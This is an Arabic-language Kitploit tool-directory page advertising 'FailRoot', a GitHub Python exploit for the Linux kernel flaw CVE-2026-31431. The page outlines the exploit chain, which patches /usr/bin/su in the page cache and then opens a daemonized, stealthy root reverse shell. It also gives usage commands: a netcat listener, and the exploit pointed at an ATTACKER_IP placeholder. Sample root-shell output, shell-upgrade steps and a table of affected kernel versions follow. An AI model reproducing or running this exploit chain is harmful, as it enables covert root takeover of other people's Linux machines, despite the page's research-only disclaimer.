Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-31431-REVSHELL — سلاح استغلال مكتوب بلغة بايثون لثغرة CVE-2026-31431، يربط تصعيد الامتيازات في نواة لينكس بقشرة عكسية جذرية تعمل كخفيّة مع PTY كامل، مع تصحيح /usr/bin/su في الذاكرة. | Kitploit
أدوات/GitHubGitHub/danimrtzp/cve-2026-31431-revshell
تصعيد الامتيازاتأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقالفريق الأحمرتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
danimrtzp/cve-2026-31431-revshell

CVE-2026-31431-REVSHELL

سلاح استغلال مكتوب بلغة بايثون لثغرة CVE-2026-31431، يربط تصعيد الامتيازات في نواة لينكس بقشرة عكسية جذرية تعمل كخفيّة مع PTY كامل، مع تصحيح /usr/bin/su في الذاكرة.

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد


root@kitploit:~
  █▀▀ ▄▀█ █ █   █▀█ █▀█ █▀█ ▀█▀
  █▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░

  CVE-2026-31431  •  Linux Kernel LPE  →  Root Reverse Shell

نظرة عامة

FailRoot هو استغلال مُسلّح لثغرة CVE-2026-31431 — وهي كتابة خارج النطاق في نظام crypto: algif_aead الفرعي في نواة لينكس.

يجمع بين تصعيد الامتيازات وقشرة عكسية جذرية تعمل كخفيّة مع PTY كامل:

root@kitploit:~
AF_ALG + splice()  →  4-byte page-cache write  →  patch /usr/bin/su  →  root

الاستغلال بأكمله في ملف واحد. لا حاجة للترجمة. لا تبعيات خارجية. لا أثر على القرص — ملف su الثنائي يتم تعديله في الذاكرة فقط.


ما الذي يفعله

  1. يتحول إلى خفيّة فورًا — fork مزدوج، ينفصل عن الطرفية، ويعيد موجه الأوامر فورًا
  2. يحمّل وحدات النواة — algif_aead + authencesn عبر استراتيجيات احتياطية متعددة
  3. يستغل CVE-2026-31431 — يكتب 4 بايتات مُتحكَّم بها في ذاكرة التخزين المؤقت لصفحات /usr/bin/su
  4. يُطلق قشرة عكسية جذرية PTY — pty.spawn("/usr/bin/su") → TTY جذر تفاعلي بالكامل

القشرة العكسية تبقى على قيد الحياة عند إغلاق الطرفية (يتم تجاهل SIGHUP)، ولا تُظهر أي مخرجات على الجهاز الهدف، وتتصل بمحاولات إعادة متكررة لمدة تصل إلى 3 دقائق.


الاستخدام

root@kitploit:~
# المهاجم — تشغيل المستمع:
nc -lvnp 4444

# الهدف — تشغيل الاستغلال (لن يظهر شيء، يتحول إلى خفيّة فورًا):
python3 exploit.py <ATTACKER_IP> 4444
root@kitploit:~
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234

root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)

ترقية TTY (من جهة المهاجم، داخل القشرة)

root@kitploit:~
Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash

النواة المتأثرة


المتطلبات

  • Python >= 3.10 (os.splice())
  • صلاحية قراءة لـ /usr/bin/su (قابل للقراءة عالميًا على جميع التوزيعات)
  • توفر وحدتي النواة algif_aead و authencesn
  • لا حاجة لـ sudo

المؤلف

danimrtzp


إخلاء مسؤولية

لأغراض البحث الأمني المصرّح به والتعليم فقط. إساءة الاستخدام غير قانونية.

تنزيل الأداة
منإلى (غير شامل)
4.145.10.254
5.115.15.204
5.166.1.170
6.26.6.137
6.76.12.85
6.136.18.22
6.196.19.12
7.0rc1–rc6